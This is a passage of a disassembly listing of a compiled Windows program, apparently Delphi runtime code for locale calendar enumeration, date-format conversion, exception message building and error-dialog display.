call sub_4000A8E0
pop ecx
mov edx, [ebp+var_14]
mov eax, esi
call sub_400048D8
push ebp
push 6
lea eax, [ebp+var_18]
push eax
mov ecx, offset off_4001A900
mov edx, ebx
dec edx
mov eax, [ebp+var_8]
add eax, 2Ah
call sub_4000A8E0
pop ecx
mov edx, [ebp+var_18]
mov eax, edi
call sub_400048D8
inc ebx
add edi, 4
add esi, 4
cmp ebx, 8
jnz short loc_4000A9B0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000AA36
loc_4000AA21: ; CODE XREF: sub_4000A91C+118�j
lea eax, [ebp+var_18]
mov edx, 4
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000AA2F: ; DATA XREF: sub_4000A91C+11�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000AA21
; ---------------------------------------------------------------------------
loc_4000AA36: ; CODE XREF: sub_4000A91C+112�j
; DATA XREF: sub_4000A91C+100�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000A91C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000AA40 proc near ; DATA XREF: sub_4000AAF4+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
xor esi, esi
mov ebx, 1
jmp short loc_4000AA54
; ---------------------------------------------------------------------------
loc_4000AA4E: ; CODE XREF: sub_4000AA40+1C�j
cmp ebx, 7
jz short loc_4000AA72
inc ebx
loc_4000AA54: ; CODE XREF: sub_4000AA40+C�j
cmp ds:dword_4001E8D4[ebx*4], 0
jnz short loc_4000AA4E
lea eax, dword_4001E8D4[ebx*4]
mov edx, [ebp+arg_0]
call sub_40004A7C
mov esi, 1
loc_4000AA72: ; CODE XREF: sub_4000AA40+11�j
mov eax, esi
pop esi
pop ebx
pop ebp
retn 4
sub_4000AA40 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000AA7C proc near ; DATA XREF: sub_4000AAF4+77�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push ebx
push esi
xor eax, eax
push ebp
push offset loc_4000AAE1
push dword ptr fs:[eax]
mov fs:[eax], esp
xor esi, esi
mov ebx, 1
jmp short loc_4000AAA0
; ---------------------------------------------------------------------------
loc_4000AA9A: ; CODE XREF: sub_4000AA7C+2C�j
cmp ebx, 7
jz short loc_4000AACB
inc ebx
loc_4000AAA0: ; CODE XREF: sub_4000AA7C+1C�j
cmp ds:dword_4001E8F0[ebx*4], 0FFFFFFFFh
jnz short loc_4000AA9A
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_40004A7C
mov eax, [ebp+var_4]
xor edx, edx
call sub_40007DD4
mov ds:dword_4001E8F0[ebx*4], eax
mov esi, 1
loc_4000AACB: ; CODE XREF: sub_4000AA7C+21�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000AAE8
loc_4000AAD8: ; CODE XREF: sub_4000AA7C+6A�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000AAE1: ; DATA XREF: sub_4000AA7C+A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000AAD8
; ---------------------------------------------------------------------------
loc_4000AAE8: ; CODE XREF: sub_4000AA7C+64�j
; DATA XREF: sub_4000AA7C+57�o
mov eax, esi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_4000AA7C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000AAF4 proc near ; CODE XREF: sub_4000BE64+31�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push esi
xor eax, eax
push ebp
push offset loc_4000AB8B
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
call sub_400065C8 ; GetThreadLocale
mov ecx, offset dword_4000ABA0
mov edx, 100Bh
call sub_4000A868
mov eax, [ebp+var_4]
mov edx, 1
call sub_40007DD4
mov esi, eax
mov eax, esi
add eax, 0FFFFFFFDh
sub eax, 3
jnb short loc_4000AB75
push 4
push esi
call sub_400065C8 ; GetThreadLocale
push eax
push offset sub_4000AA40
call sub_40006528 ; EnumCalendarInfoA
mov edx, 7
mov eax, offset dword_4001E8F4
loc_4000AB56: ; CODE XREF: sub_4000AAF4+6C�j
mov dword ptr [eax], 0FFFFFFFFh
add eax, 4
dec edx
jnz short loc_4000AB56
push 3
push esi
call sub_400065C8 ; GetThreadLocale
push eax
push offset sub_4000AA7C
call sub_40006528 ; EnumCalendarInfoA
loc_4000AB75: ; CODE XREF: sub_4000AAF4+43�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000AB92
loc_4000AB82: ; CODE XREF: sub_4000AAF4+9C�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000AB8B: ; DATA XREF: sub_4000AAF4+9�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000AB82
; ---------------------------------------------------------------------------
loc_4000AB92: ; CODE XREF: sub_4000AAF4+96�j
; DATA XREF: sub_4000AAF4+89�o
pop esi
pop ecx
pop ebp
retn
sub_4000AAF4 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_4000ABA0 dd 31h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000ABA4 proc near ; CODE XREF: sub_4000BE64+11C�p
; sub_4000BE64+149�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_4000AD74
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, 1
mov eax, edi
call sub_40004884
lea eax, [ebp+var_8]
push eax
call sub_400065C8 ; GetThreadLocale
mov ecx, offset dword_4000AD8C
mov edx, 1009h
call sub_4000A868
mov eax, [ebp+var_8]
mov edx, 1
call sub_40007DD4
add eax, 0FFFFFFFDh
sub eax, 3
jb loc_4000AD4A
mov eax, ds:dword_4001E8CC
sub eax, 4
jz short loc_4000AC16
add eax, 0FFFFFFF3h
sub eax, 2
jb short loc_4000AC16
xor eax, eax
jmp short loc_4000AC18
; ---------------------------------------------------------------------------
loc_4000AC16: ; CODE XREF: sub_4000ABA4+64�j
; sub_4000ABA4+6C�j
mov al, 1
loc_4000AC18: ; CODE XREF: sub_4000ABA4+70�j
test al, al
jz short loc_4000AC53
jmp short loc_4000AC43
; ---------------------------------------------------------------------------
loc_4000AC1E: ; CODE XREF: sub_4000ABA4+A8�j
movzx eax, byte ptr [esi+ebx-1]
sub al, 47h
jz short loc_4000AC42
sub al, 20h
jz short loc_4000AC42
lea eax, [ebp+var_C]
movzx edx, byte ptr [esi+ebx-1]
call sub_40004A6C
mov edx, [ebp+var_C]
mov eax, edi
call sub_40004B50
loc_4000AC42: ; CODE XREF: sub_4000ABA4+81�j
; sub_4000ABA4+85�j
inc ebx
loc_4000AC43: ; CODE XREF: sub_4000ABA4+78�j
mov eax, esi
call sub_40004B44
cmp ebx, eax
jle short loc_4000AC1E
jmp loc_4000AD59
; ---------------------------------------------------------------------------
loc_4000AC53: ; CODE XREF: sub_4000ABA4+76�j
mov eax, edi
mov edx, esi
call sub_400048D8
jmp loc_4000AD59
; ---------------------------------------------------------------------------
loc_4000AC61: ; CODE XREF: sub_4000ABA4+1AF�j
movzx eax, byte ptr [esi+ebx-1]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000ACA0
mov edx, ebx
mov eax, esi
call sub_4000BB88
mov [ebp+var_4], eax
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_4]
mov edx, ebx
mov eax, esi
call sub_40004DA8
mov edx, [ebp+var_10]
mov eax, edi
call sub_40004B50
add ebx, [ebp+var_4]
jmp loc_4000AD4A
; ---------------------------------------------------------------------------
loc_4000ACA0: ; CODE XREF: sub_4000ABA4+CC�j
mov edx, offset dword_4000AD90
lea eax, [esi+ebx-1]
mov ecx, 2
call sub_400081E0
test eax, eax
jnz short loc_4000ACC9
mov eax, edi
mov edx, offset dword_4000AD9C
call sub_40004B50
inc ebx
jmp loc_4000AD49
; ---------------------------------------------------------------------------
loc_4000ACC9: ; CODE XREF: sub_4000ABA4+111�j
mov edx, offset aYyyy_0 ; "yyyy"
lea eax, [esi+ebx-1]
mov ecx, 4
call sub_400081E0
test eax, eax
jnz short loc_4000ACF1
mov eax, edi
mov edx, offset aEeee ; "eeee"
call sub_40004B50
add ebx, 3
jmp short loc_4000AD49
; ---------------------------------------------------------------------------
loc_4000ACF1: ; CODE XREF: sub_4000ABA4+13A�j
mov edx, offset aYy ; "yy"
lea eax, [esi+ebx-1]
mov ecx, 2
call sub_400081E0
test eax, eax
jnz short loc_4000AD17
mov eax, edi
mov edx, offset dword_4000ADC4
call sub_40004B50
inc ebx
jmp short loc_4000AD49
; ---------------------------------------------------------------------------
loc_4000AD17: ; CODE XREF: sub_4000ABA4+162�j
movzx eax, byte ptr [esi+ebx-1]
sub al, 59h
jz short loc_4000AD24
sub al, 20h
jnz short loc_4000AD32
loc_4000AD24: ; CODE XREF: sub_4000ABA4+17A�j
mov eax, edi
mov edx, offset dword_4000ADD0
call sub_40004B50
jmp short loc_4000AD49
; ---------------------------------------------------------------------------
loc_4000AD32: ; CODE XREF: sub_4000ABA4+17E�j
lea eax, [ebp+var_14]
movzx edx, byte ptr [esi+ebx-1]
call sub_40004A6C
mov edx, [ebp+var_14]
mov eax, edi
call sub_40004B50
loc_4000AD49: ; CODE XREF: sub_4000ABA4+120�j
; sub_4000ABA4+14B�j ...
inc ebx
loc_4000AD4A: ; CODE XREF: sub_4000ABA4+56�j
; sub_4000ABA4+F7�j
mov eax, esi
call sub_40004B44
cmp ebx, eax
jle loc_4000AC61
loc_4000AD59: ; CODE XREF: sub_4000ABA4+AA�j
; sub_4000ABA4+B8�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000AD7B
loc_4000AD66: ; CODE XREF: sub_4000ABA4+1D5�j
lea eax, [ebp+var_14]
mov edx, 4
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000AD74: ; DATA XREF: sub_4000ABA4+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000AD66
; ---------------------------------------------------------------------------
loc_4000AD7B: ; CODE XREF: sub_4000ABA4+1CF�j
; DATA XREF: sub_4000ABA4+1BD�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000ABA4 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_4000AD8C dd 31h dword_4000AD90 dd 6767h, 0FFFFFFFFh, 3dword_4000AD9C dd 676767h aYyyy_0 db 'yyyy',0 ; DATA XREF: sub_4000ABA4:loc_4000ACC9�o
align 4
dd 0FFFFFFFFh, 4
aEeee db 'eeee',0 ; DATA XREF: sub_4000ABA4+13E�o
align 4
aYy db 'yy',0 ; DATA XREF: sub_4000ABA4:loc_4000ACF1�o
align 4
dd 0FFFFFFFFh, 2
dword_4000ADC4 dd 6565h, 0FFFFFFFFh, 1dword_4000ADD0 dd 65h
; =============== S U B R O U T I N E =======================================
sub_4000ADD4 proc near ; CODE XREF: sub_4000ADE0+63�p
test eax, eax
jz short locret_4000ADDD
sub eax, 1000h
locret_4000ADDD: ; CODE XREF: sub_4000ADD4+2�j
retn
sub_4000ADD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000ADE0 proc near ; CODE XREF: sub_4000AF68+F�p
var_458 = byte ptr -458h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_348 = dword ptr -348h
var_344 = byte ptr -344h
var_340 = dword ptr -340h
var_33C = byte ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_320 = dword ptr -320h
var_312 = byte ptr -312h
var_212 = byte ptr -212h
var_10D = byte ptr -10Dh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFBA8h
push ebx
push esi
push edi
mov [ebp+var_4], ecx
mov ebx, edx
mov esi, eax
push 1Ch
lea eax, [ebp+var_330]
push eax
push ebx
call sub_40006648 ; VirtualQuery
cmp [ebp+var_320], 1000h
jnz short loc_4000AE2A
push 105h
lea eax, [ebp+var_212]
push eax
mov eax, [ebp+var_32C]
push eax
call sub_40006598 ; GetModuleFileNameA
test eax, eax
jnz short loc_4000AE4D
loc_4000AE2A: ; CODE XREF: sub_4000ADE0+2C�j
push 105h
lea eax, [ebp+var_212]
push eax
mov eax, ds:dword_4001E7F8
push eax
call sub_40006598 ; GetModuleFileNameA
mov eax, ebx
call sub_4000ADD4
mov [ebp+var_8], eax
jmp short loc_4000AE56
; ---------------------------------------------------------------------------
loc_4000AE4D: ; CODE XREF: sub_4000ADE0+48�j
sub ebx, [ebp+var_32C]
mov [ebp+var_8], ebx
loc_4000AE56: ; CODE XREF: sub_4000ADE0+6B�j
lea eax, [ebp+var_212]
mov dl, 5Ch
call sub_4000BCD0
mov edx, eax
inc edx
lea eax, [ebp+var_10D]
mov ecx, 104h
call sub_40008184
mov ebx, offset dword_4000AF60
mov edi, offset dword_4000AF60
mov eax, esi
mov edx, ds:off_40006DE0
call sub_40003E74
test al, al
jz short loc_4000AEB2
mov eax, [esi+4]
call sub_40004D48
mov ebx, eax
mov eax, ebx
call sub_4000815C
test eax, eax
jz short loc_4000AEB2
cmp byte ptr [ebx+eax-1], 2Eh
jz short loc_4000AEB2
mov edi, offset dword_4000AF64
loc_4000AEB2: ; CODE XREF: sub_4000ADE0+AF�j
; sub_4000ADE0+C4�j ...
push 100h
lea eax, [ebp+var_312]
push eax
mov eax, off_4001B0B8
mov eax, [eax+4]
push eax
mov eax, ds:dword_4001E7F8
call sub_40005C08
push eax
call sub_40006738 ; LoadStringA
lea edx, [ebp+var_458]
mov eax, [esi]
call sub_40003C6C
lea eax, [ebp+var_458]
mov [ebp+var_358], eax
mov [ebp+var_354], 4
lea eax, [ebp+var_10D]
mov [ebp+var_350], eax
mov [ebp+var_34C], 6
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov [ebp+var_344], 5
mov [ebp+var_340], ebx
mov [ebp+var_33C], 6
mov [ebp+var_338], edi
mov [ebp+var_334], 6
lea eax, [ebp+var_358]
push eax
push 4
lea ecx, [ebp+var_312]
mov edx, [ebp+arg_0]
mov eax, [ebp+var_4]
call sub_4000868C
mov eax, [ebp+var_4]
call sub_4000815C
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4000ADE0 endp
; ---------------------------------------------------------------------------
align 10h
dword_4000AF60 dd 0 ; sub_4000ADE0+9B�o
dword_4000AF64 dd 2Eh
; =============== S U B R O U T I N E =======================================
sub_4000AF68 proc near ; CODE XREF: sub_4000B71C�p
var_444 = byte ptr -444h
var_440 = byte ptr -440h
var_400 = byte ptr -400h
add esp, 0FFFFFBBCh
push 400h
lea ecx, [esp+448h+var_400]
call sub_4000ADE0
mov eax, off_4001B048
cmp byte ptr [eax], 0
jz short loc_4000AFE4
mov eax, off_4001AF4C
call sub_400033D8
call sub_40002D5C
lea eax, [esp+444h+var_400]
push eax
lea eax, [esp+448h+var_400]
push eax
call sub_40006710 ; CharToOemA
push 0
lea eax, [esp+448h+var_444]
push eax
lea eax, [esp+44Ch+var_400]
call sub_4000815C
push eax
lea eax, [esp+450h+var_400]
push eax
push 0FFFFFFF4h
call sub_400065B0 ; GetStdHandle
push eax
call sub_40006660 ; WriteFile
push 0
lea eax, [esp+448h+var_444]
push eax
push 2
push offset dword_4000B02C
push 0FFFFFFF4h
call sub_400065B0 ; GetStdHandle
push eax
call sub_40006660 ; WriteFile
jmp short loc_4000B01A
; ---------------------------------------------------------------------------
loc_4000AFE4: ; CODE XREF: sub_4000AF68+1C�j
push 40h
lea eax, [esp+448h+var_440]
push eax
mov eax, off_4001AF28
mov eax, [eax+4]
push eax
mov eax, ds:dword_4001E7F8
call sub_40005C08
push eax
call sub_40006738 ; LoadStringA
push 2010h
lea eax, [esp+448h+var_440]
push eax
lea eax, [esp+44Ch+var_400]
push eax
push 0
call sub_40006740 ; MessageBoxA
loc_4000B01A: ; CODE XREF: sub_4000AF68+7A�j
add esp, 444h
retn
sub_4000AF68 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_4000B02C dd 0A0Dh
; =============== S U B R O U T I N E =======================================
sub_4000B030 proc near ; CODE XREF: sub_4000B230+32�p
; sub_4000B2B0+36�p ...
push ebx
push esi
push edi
test dl, dl
jz short loc_4000B03F
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4000B03F: ; CODE XREF: sub_4000B030+5�j
mov esi, ecx
mov ebx, edx
mov edi, eax
lea eax, [edi+4]
mov edx, esi
call sub_400048D8
mov eax, edi
test bl, bl
jz short loc_4000B064
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4000B064: ; CODE XREF: sub_4000B030+23�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_4000B030 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B06C proc near ; CODE XREF: sub_4000B300+77�p
; sub_4000B488+127�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push ebx
push esi
push edi
test dl, dl
jz short loc_4000B080
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4000B080: ; CODE XREF: sub_4000B06C+A�j
mov esi, ecx
mov ebx, edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_4000B0C6
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov eax, esi
call sub_400086CC
mov edx, [ebp+var_4]
lea eax, [edi+4]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000B0CD
loc_4000B0BD: ; CODE XREF: sub_4000B06C+5F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000B0C6: ; DATA XREF: sub_4000B06C+1D�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000B0BD
; ---------------------------------------------------------------------------
loc_4000B0CD: ; CODE XREF: sub_4000B06C+59�j
; DATA XREF: sub_4000B06C+4C�o
mov eax, edi
test bl, bl
jz short loc_4000B0E2
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4000B0E2: ; CODE XREF: sub_4000B06C+65�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 8
sub_4000B06C endp
; =============== S U B R O U T I N E =======================================
sub_4000B0EC proc near ; CODE XREF: sub_4000B3D8+D�p
; sub_4000B72C+D�p ...
push ebx
push esi
push edi
test dl, dl
jz short loc_4000B0FB
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4000B0FB: ; CODE XREF: sub_4000B0EC+5�j
mov esi, ecx
mov ebx, edx
mov edi, eax
lea edx, [edi+4]
mov eax, esi
call sub_400062F0
mov eax, edi
test bl, bl
jz short loc_4000B120
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4000B120: ; CODE XREF: sub_4000B0EC+23�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_4000B0EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B128 proc near ; CODE XREF: sub_40007998+14�p
; sub_4000B230+51�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push 0
push ebx
push esi
push edi
test dl, dl
jz short loc_4000B13E
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4000B13E: ; CODE XREF: sub_4000B128+C�j
mov esi, ecx
mov ebx, edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_4000B194
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
lea edx, [ebp+var_8]
mov eax, esi
call sub_400062F0
mov eax, [ebp+var_8]
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
call sub_400086CC
mov edx, [ebp+var_4]
lea eax, [edi+4]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000B19B
loc_4000B186: ; CODE XREF: sub_4000B128+71�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000B194: ; DATA XREF: sub_4000B128+1F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000B186
; ---------------------------------------------------------------------------
loc_4000B19B: ; CODE XREF: sub_4000B128+6B�j
; DATA XREF: sub_4000B128+59�o
mov eax, edi
test bl, bl
jz short loc_4000B1B0
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4000B1B0: ; CODE XREF: sub_4000B128+77�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_4000B128 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B1BC proc near ; CODE XREF: sub_40015EE4+84�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
test dl, dl
jz short loc_4000B1CE
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4000B1CE: ; CODE XREF: sub_4000B1BC+8�j
mov esi, ecx
mov ebx, edx
mov edi, eax
lea eax, [edi+4]
mov edx, esi
call sub_400048D8
mov eax, [ebp+arg_0]
mov [edi+8], eax
mov eax, edi
test bl, bl
jz short loc_4000B1F9
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4000B1F9: ; CODE XREF: sub_4000B1BC+2C�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_4000B1BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000B204 proc near ; DATA XREF: .text:40006E8C�o
; .text:40006EE8�o ...
cmp byte ptr [eax+0Ch], 0
jz short locret_4000B20F
call sub_40003C9C
locret_4000B20F: ; CODE XREF: sub_4000B204+4�j
retn
sub_4000B204 endp
; ---------------------------------------------------------------------------
off_4000B210 dd offset dword_4000B214 ; DATA XREF: sub_4000CC50+151�r
dword_4000B214 dd 4554090Eh, 726F7272h, 8636552h, 1000000h db 3 dup(0)
dd offset off_40001000
db 4
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000B230 proc near ; CODE XREF: sub_4000B2B0:loc_4000B2EF�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
xor ebx, ebx
call sub_40002DDC
mov esi, eax
jmp short loc_4000B241
; ---------------------------------------------------------------------------
loc_4000B240: ; CODE XREF: sub_4000B230+1D�j
inc ebx
loc_4000B241: ; CODE XREF: sub_4000B230+E�j
cmp ebx, 6
jg short loc_4000B24F
cmp esi, dword_4001A91C[ebx*8]
jnz short loc_4000B240
loc_4000B24F: ; CODE XREF: sub_4000B230+14�j
cmp ebx, 6
jg short loc_4000B269
mov ecx, dword_4001A920[ebx*8]
mov dl, 1
mov eax, ds:off_40006F00
call sub_4000B030
jmp short loc_4000B286
; ---------------------------------------------------------------------------
loc_4000B269: ; CODE XREF: sub_4000B230+22�j
mov [esp+10h+var_10], esi
mov [esp+10h+var_C], 0
push esp
push 0
mov ecx, off_4001AF24
mov dl, 1
mov eax, ds:off_40006F00
call sub_4000B128
loc_4000B286: ; CODE XREF: sub_4000B230+37�j
mov [eax+0Ch], esi
pop ecx
pop edx
pop esi
pop ebx
retn
sub_4000B230 endp
; ---------------------------------------------------------------------------
align 10h
off_4000B290 dd offset dword_4000B294 ; DATA XREF: sub_4000CC50+166�r
dword_4000B294 dd 45540A0Eh, 70656378h, 63655274h, 8, 1 dd offset off_40001000
dd 4
; =============== S U B R O U T I N E =======================================
sub_4000B2B0 proc near ; CODE XREF: sub_40002D04+16�p
; DATA XREF: sub_4000B72C+33�o ...
push ebx
mov ebx, edx
mov edx, eax
dec dl
jz short loc_4000B2C5
dec dl
jz short loc_4000B2CD
dec edx
sub dl, 16h
jb short loc_4000B2D5
jmp short loc_4000B2EF
; ---------------------------------------------------------------------------
loc_4000B2C5: ; CODE XREF: sub_4000B2B0+7�j
mov edx, ds:dword_4001E91C
jmp short loc_4000B2F6
; ---------------------------------------------------------------------------
loc_4000B2CD: ; CODE XREF: sub_4000B2B0+B�j
mov edx, ds:dword_4001E920
jmp short loc_4000B2F6
; ---------------------------------------------------------------------------
loc_4000B2D5: ; CODE XREF: sub_4000B2B0+11�j
movzx eax, al
lea eax, dword_4001A93C[eax*8]
mov ecx, [eax+4]
mov eax, [eax]
mov dl, 1
call sub_4000B030
mov edx, eax
jmp short loc_4000B2F6
; ---------------------------------------------------------------------------
loc_4000B2EF: ; CODE XREF: sub_4000B2B0+13�j
call sub_4000B230
mov edx, eax
loc_4000B2F6: ; CODE XREF: sub_4000B2B0+1B�j
; sub_4000B2B0+23�j ...
push ebx
mov eax, edx
jmp sub_400042E4
sub_4000B2B0 endp
; ---------------------------------------------------------------------------
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B300 proc near ; CODE XREF: sub_4000B3BC+3�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+var_4], ebx
mov edi, ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000B39C
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jz short loc_4000B335
lea eax, [ebp+var_4]
mov edx, ebx
call sub_4000491C
jmp short loc_4000B342
; ---------------------------------------------------------------------------
loc_4000B335: ; CODE XREF: sub_4000B300+27�j
lea edx, [ebp+var_4]
mov eax, off_4001B038
call sub_400062F0
loc_4000B342: ; CODE XREF: sub_4000B300+33�j
mov eax, [ebp+var_4]
mov [ebp+var_1C], eax
mov [ebp+var_18], 0Bh
mov [ebp+var_14], esi
mov [ebp+var_10], 0Bh
mov [ebp+var_C], edi
mov [ebp+var_8], 0
lea eax, [ebp+var_1C]
push eax
push 2
lea edx, [ebp+var_20]
mov eax, off_4001B06C
call sub_400062F0
mov ecx, [ebp+var_20]
mov dl, 1
mov eax, ds:off_40007608
call sub_4000B06C
mov ebx, eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000B3A3
loc_4000B38B: ; CODE XREF: sub_4000B300+A1�j
lea eax, [ebp+var_20]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000B39C: ; DATA XREF: sub_4000B300+1A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000B38B
; ---------------------------------------------------------------------------
loc_4000B3A3: ; CODE XREF: sub_4000B300+9B�j
; DATA XREF: sub_4000B300+86�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000B300 endp
; =============== S U B R O U T I N E =======================================
sub_4000B3AC proc near ; CODE XREF: sub_4000B3BC+11�p
mov esp, ecx
mov [esp+0], edx
mov ebp, [ebp+0]
jmp sub_400042E4
sub_4000B3AC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B3BC proc near ; DATA XREF: sub_4000B72C+67�o
; .bss:off_4001C024�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_4000B300
lea ecx, [ebp+arg_0]
add ecx, 4
mov edx, [ebp+arg_0]
call sub_4000B3AC
pop ebp
retn 4
sub_4000B3BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000B3D8 proc near ; CODE XREF: sub_400030B4+9�p
; DATA XREF: sub_4000B72C+74�o ...
mov ecx, off_4001AF40
mov dl, 1
mov eax, ds:off_40007668
call sub_4000B0EC
call sub_400042E4
retn
sub_4000B3D8 endp
; =============== S U B R O U T I N E =======================================
sub_4000B3F0 proc near ; CODE XREF: sub_4000B470+5�p
; sub_4000B654+20�p
mov eax, [eax]
cmp eax, 0C0000092h
jg short loc_4000B425
jz short loc_4000B454
cmp eax, 0C000008Eh
jg short loc_4000B417
jz short loc_4000B457
sub eax, 0C0000005h
jz short loc_4000B460
sub eax, 87h
jz short loc_4000B44E
dec eax
jz short loc_4000B45D
jmp short loc_4000B46C
; ---------------------------------------------------------------------------
loc_4000B417: ; CODE XREF: sub_4000B3F0+10�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_4000B454
jz short loc_4000B45A
